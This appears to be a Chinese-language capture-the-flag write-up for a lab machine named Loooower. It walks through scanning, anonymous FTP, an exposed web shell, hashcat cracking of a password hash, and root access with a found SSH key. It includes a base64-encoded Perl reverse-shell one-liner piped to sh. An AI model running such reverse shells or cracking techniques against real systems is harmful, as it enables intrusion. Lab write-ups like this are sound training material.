1.looooower
1. 信息收集
┌──(root㉿kali)-[~]
└─# nmap -sCV 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-16 00:56 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000080s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| Session bandwidth limit in byte/s is 102400
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 106 113 4096 May 15 08:03 confidential
|_drwxr-xr-x 2 106 113 4096 May 15 07:37 uploads
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AF:68:12 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds
1.1. ftp匿名登录
┌──(root㉿kali)-[~]
└─# ftp 192.168.56.103
Connected to 192.168.56.103.
220 (vsFTPd 3.0.3)
Name (192.168.56.103:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||51923|)
150 Here comes the directory listing.
drwxr-xr-x 2 106 113 4096 May 15 08:03 confidential
drwxr-xr-x 2 106 113 4096 May 15 07:37 uploads
┌──(root㉿kali)-[~]
└─# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
┌──(root㉿kali)-[~]
└─# cat hosts
127.0.0.1 localhost
127.0.1.1 Loooower dev.loooower
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
1.2. 配hosts
┌──(root㉿kali)-[~]
└─# curl dev.loooower
<!DOCTYPE html>
<html>
<head>
<title>Nothing here</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
margin-top: 100px;
color: #333;
}
h1 {
font-size: 3em;
margin-bottom: 20px;
}
p {
font-size: 1.2em;
}
.comment {
color: #999;
font-size: 0.8em;
margin-top: 50px;
}
</style>
</head>
<body>
<h1>Nothing here</h1>
<p>This page is intentionally left blank.</p>
<!-- Tm90aGluZyBoZXJlIGFnYWlu -->
</body>
</html>
┌──(root㉿kali)-[~]
└─# echo 'Tm90aGluZyBoZXJlIGFnYWlu' |base64 -d
Nothing here again
1.3. 目录扫描
┌──(root㉿kali)-[~]
└─# dirsearch -u dev.loooower -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_dev.loooower/_25-05-16_01-31-24.txt
Target: http://dev.loooower/
[01:31:24] Starting:
[01:31:43] 200 - 4KB - /shell.php
Task Completed
1.4. shell.php
直接去github上面搜索这个, 这个多半就是一个开源的后门shell,因为正常人出吧唧不会写这么多代码
GitHub - flozz/p0wny-shell at 788b3d2b3d369a42e82b04686ed4054da74d37bf
是我想多了。原来很简单,直接访问就能用了
傻子都会
1.5. 弹shell
echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTkyLjE2OC41Ni4xMDIiOyRwPTQ0NDQ7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygic2ggLWkiKTt9Oyc= |base64 -d |sh
1.6. userflag
(remote) www-data@Loooower:/home/welcome$ ls
backup.sh user.txt
(remote) www-data@Loooower:/home/welcome$ cat user.txt
flag{user-ea03b17fbd2c5e4895ba0775348cc1a5}
2. 提权
2.1. backup.sh
(remote) www-data@Loooower:/home/welcome$ cat backup.sh
#!/bin/bash
# Backup Script v1.0
# Usage: ./backup.sh [source_dir] [dest_dir]
# Check for required arguments
if [ $# -ne 2 ]; then
echo "Usage: $0 <source_dir> <dest_dir>"
exit 1
fi
# Verify source directory exists
if [ ! -d "$1" ]; then
echo "Error: Source directory $1 not found"
exit 1
fi
# Create destination directory if needed
mkdir -p "$2" || { echo "Error: Cannot create destination directory"; exit 1; }
# Generate timestamp
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
BACKUP_NAME="backup_${TIMESTAMP}.tar.gz"
# Create backup
echo "Creating backup $BACKUP_NAME from $1..."
tar -czf "$2/$BACKUP_NAME" "$1" 2>/dev/null
# Verify backup was created
if [ $? -ne 0 ]; then
echo "Error: Backup failed"
exit 1
fi
# Calculate and display backup size
BACKUP_SIZE=$(du -h "$2/$BACKUP_NAME" | cut -f1)
echo "Backup completed successfully. Size: $BACKUP_SIZE"
# Cleanup old backups (keep last 5)
echo "Rotating backups..."
ls -t "$2"/backup_*.tar.gz | tail -n +6 | xargs rm -f
# The password for welcome is: $1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0
# Store this securely and don't commit to version control
exit 0
2.2. 爆破welcome用户hash
hashcat.exe hash.txt roukyou.txt
$1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0:alexis15
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0
Time.Started.....: Fri May 16 14:15:35 2025 (0 secs)
Time.Estimated...: Fri May 16 14:15:35 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 665.6 kH/s (9.02ms) @ Accel:32 Loops:250 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 98304/14344387 (0.69%)
Rejected.........: 0/98304 (0.00%)
Restore.Point....: 49152/14344387 (0.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: truefriend -> FANNY
Hardware.Mon.#1..: Temp: 54c Util: 99% Core:2550MHz Mem:8001MHz Bus:8
Started: Fri May 16 14:15:22 2025
Stopped: Fri May 16 14:15:36 2025
使用welcome用户登录上去
welcome@Loooower:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for welcome:
Matching Defaults entries for welcome on Loooower:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on Loooower:
(ALL) PASSWD: /usr/bin/figlet
发现有个这个 figlet,gtfobins上没搜到,看了下参数没什么太多可以利用的。
2.3. 私钥登录
确实是好久没打靶机了。我都没想到可以直接用私钥登root,看了群主视频才发现可以直接ssh
当时就是用私钥生成出公钥看了下用户名,发现不是root就跳过了
welcome@Loooower:~/.ssh$ ssh -i id_rsa root@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can''t be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux Loooower 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 15 08:42:54 2025 from 192.168.3.94
root@Loooower:~# cat /root/root.txt
flag{root-cd519e63e450d863e5ee02814bae016d}
root@Loooower:~/.ssh# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3gXnIh3UX3UlCZC6kWuRL4pX7rb/VdvTX+r4rTrPrny7OO+V/jgJPzDp4ICfeMYF2HeYtMmi4svQ8aNeq/g9VTGGS2bNh8YF6FQhjZwQy43RUrnK+bMTbT9zmMbZpRgNmjMxxxHb56RdE+tOVO/qqsEASXXKLG7rwVSa16onG4wti5gABqCn/kpdbqKGEW6fGSqu7qjIt04y4nDNj2mxIXcOYtlgrs7DgtF6xxCmVHuclXc+lZQAipDmkHw+oAkwUrisrJdGwde2AGp78X1/J7dK24n39lf6I/vqieIY4wJb9nCWTHlk1/F501ZCH/qVFmd8XGokQzpkIRfzBowZUa8+sdmzLok5p0icFKSS0TtUA+IwGc1HD5LXLSBSfTaQcC/N9L5Jv9LaEw/kldZPKbvWEOHWxCxknhDj7xiBGVIGDpn2cvt9Fo5ksvnuvTiw944D8zvX6Ma3e1CAcm5+QY2zhL7iooUArRdFwVKutRwuXfLwvSiQU8rrb528q1/s= welcome@Loooower